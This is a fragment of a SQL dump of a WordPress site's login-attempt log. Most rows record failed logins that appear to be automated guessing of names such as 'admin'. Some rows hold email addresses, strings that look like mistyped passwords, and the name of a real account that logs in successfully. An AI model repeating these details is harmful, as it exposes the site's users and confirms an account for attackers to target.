(9630, 40738, 1701027929.147186, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1ª', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9631, 40739, 1701028737.124797, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¹ö', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9632, 40740, 1701030534.773710, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ6n', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),
(9633, 40741, 1701031281.462358, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½K', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9634, 40744, 1701033324.591672, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¹ö', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9635, 40745, 1701033785.435141, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½þ', 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9636, 40748, 1701035534.241266, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½¾', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2'),
(9637, 40749, 1701035979.211550, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÍ¹~Ö', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9638, 40752, 1701038634.718870, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÇÃùÛ', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),
(9541, 38513, 1700626633.664939, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;y‰', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9542, 38514, 1700626635.729691, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;y‰', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9543, 38515, 1700626637.739663, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;y‰', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9544, 38606, 1700641185.640625, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜;%¯', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9545, 38616, 1700652117.745908, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿUÿéß', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9546, 39048, 1700698412.167628, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9547, 39050, 1700699635.758071, 1, 'loginFailInvalidUsername', 'bluesky1211234!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ=[ôú', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36'),
(9548, 39051, 1700699639.425201, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz©’¼', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9549, 39052, 1700699655.920033, 1, 'loginFailInvalidUsername', '000521521000123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgKU', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36'),
(9531, 38318, 1700550494.103116, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆY', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),
(8950, 32044, 1693618786.627162, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿ýA', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8951, 32045, 1693618804.360796, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿQ×Ì+', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8952, 32046, 1693618807.851538, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsOÝ*', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8953, 32047, 1693618813.058761, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿn‰%â', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8954, 32048, 1693618818.928575, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg‘	Ö', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8923, 32017, 1693618609.774910, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿTðäf', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8924, 32018, 1693618614.887259, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1ÍU]', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8925, 32019, 1693618619.428261, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿHYÄ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8926, 32020, 1693618623.555328, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$Uo¼', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8927, 32021, 1693618628.400386, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-åº½', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8928, 32022, 1693618647.629155, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅ…í¡', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8929, 32023, 1693618660.552911, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgš²', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8930, 32024, 1693618665.746264, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq£a£', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8931, 32025, 1693618668.946128, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)Yê', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(10278, 50217, 1711049268.891263, 1, 'loginFailInvalidUsername', 'admin1', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(10279, 50218, 1711049270.492741, 1, 'loginFailInvalidUsername', 'dev', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÖ²J', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0'),
(10332, 51084, 1712319015.071736, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±ëq¬', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10333, 51085, 1712319021.924307, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ²ýÔV', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10334, 51086, 1712319022.998364, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgœå', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10335, 51087, 1712319023.171874, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ])À|', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10336, 51089, 1712319032.127396, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ·Rti', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10337, 51093, 1712319077.023220, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹‡-B', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10338, 51095, 1712319079.445005, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿnâ´|', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10339, 51102, 1712319099.030164, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ7ôh', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10340, 51103, 1712319117.231575, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶EµZ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10341, 51107, 1712319148.243166, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯°ñ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10342, 51111, 1712319169.024502, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg­\\', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9576, 39083, 1700703050.782179, 1, 'loginFailInvalidUsername', 'talhas', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"tgá', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9577, 39084, 1700703077.484179, 1, 'loginFailInvalidUsername', 'Sion', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆGì', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9470, 35604, 1699726741.830618, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜:›,', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9471, 35616, 1699759985.763410, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;|•', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9468, 35557, 1699589238.902837, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ»Çp', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9472, 35617, 1699759987.607305, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;|•', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9469, 35558, 1699589673.697745, 1, 'loginFailInvalidUsername', 'howtobehappysecrets', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgä’#', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9473, 35618, 1699759989.427882, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;|•', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9578, 39085, 1700703106.296348, 1, 'loginFailInvalidUsername', 'wp_postadmin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ>Hø', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9579, 39086, 1700703129.966638, 1, 'loginFailInvalidUsername', 'zymppg4f@gmail.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ6%‚m', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9580, 39087, 1700703154.662312, 1, 'loginFailInvalidUsername', 'administratoir', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ™7D', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9581, 39088, 1700703177.707235, 1, 'loginFailInvalidUsername', 'Zestful', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿYk¾N', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9639, 40754, 1701040771.932607, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ.c', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9640, 40756, 1701041581.435753, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½z', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36'),
(9641, 40756, 1701041581.449667, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½z', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36'),
(9642, 40758, 1701044809.354618, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¼i', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9643, 40758, 1701044809.371608, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¼i', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9644, 40761, 1701050494.274476, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½þ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9680, 41160, 1701112066.036251, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½Q', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9681, 41170, 1701116096.974650, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½S', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0'),
(9682, 41195, 1701124628.904345, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿhôL“', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),
(9683, 41216, 1701131620.049623, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½Q', 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0'),
(9684, 41221, 1701133962.318631, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½¾', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9685, 41225, 1701136466.606190, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb:M', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9686, 41228, 1701137066.896582, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½•', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9774, 41642, 1701278732.773510, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9775, 41655, 1701280128.524358, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9776, 41656, 1701280416.170838, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9777, 41657, 1701281038.891332, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½2', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9778, 41660, 1701282905.897246, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½À', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9779, 41662, 1701283642.403186, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½•', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9780, 41664, 1701284315.937934, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½:', 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53'),
(9515, 37411, 1700271291.218673, 1, 'loginFailInvalidUsername', 'bimak73555', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆ»{', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9516, 37412, 1700271292.816468, 1, 'loginFailInvalidUsername', 'bimak73555', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿQ{˜', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9517, 37415, 1700271484.457678, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ„”yœ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9518, 37445, 1700276538.861772, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿeK', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),
(9519, 37445, 1700276538.876153, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿeK', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),
(9539, 38507, 1700622327.705550, 1, 'loginFailInvalidUsername', 'ssrvvven', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"¢R*', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(9501, 36367, 1700107014.716225, 1, 'loginFailInvalidUsername', 'tomos_up_admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-^1', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(9540, 38508, 1700622328.818889, 1, 'loginFailInvalidUsername', 'ssrvvven', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"¢R*', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(9503, 36369, 1700107017.303217, 1, 'loginFailInvalidUsername', 'tomos_up_admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-^1', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(9502, 36368, 1700107015.938148, 1, 'loginFailInvalidUsername', 'tomos_up_admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-^1', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(9497, 36130, 1700036058.169420, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),
(9504, 36680, 1700112211.452244, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶µ¯:', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9498, 36189, 1700065253.231809, 1, 'loginFailInvalidUsername', 'alfredo', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÚ~Ë', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(9499, 36190, 1700065254.542317, 1, 'loginFailInvalidUsername', 'alfredo', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÚ~Ë', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(9500, 36191, 1700065255.727787, 1, 'loginFailInvalidUsername', 'alfredo', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÚ~Ë', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(9505, 36682, 1700113341.106949, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯kq', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9506, 36890, 1700129309.077116, 1, 'loginFailInvalidUsername', 'howtobehappysecrets', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅò¦r', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko');
INSERT INTO `wpou_wflogins` VALUES
(9507, 36891, 1700131698.451054, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿEC"\n', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9508, 36895, 1700141501.275512, 1, 'loginFailInvalidUsername', 'plesk_administrator', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿhôOr', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9509, 36897, 1700146572.718047, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ îJ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9510, 36902, 1700150356.357501, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµ À', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9550, 39052, 1700699655.937153, 1, 'loginFailInvalidUsername', '000521521000123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgKU', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36'),
(9551, 39053, 1700699669.921313, 1, 'loginFailInvalidUsername', 'abceasyas1231!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿvDb', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9552, 39054, 1700699673.730256, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ=\0ZJ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36'),
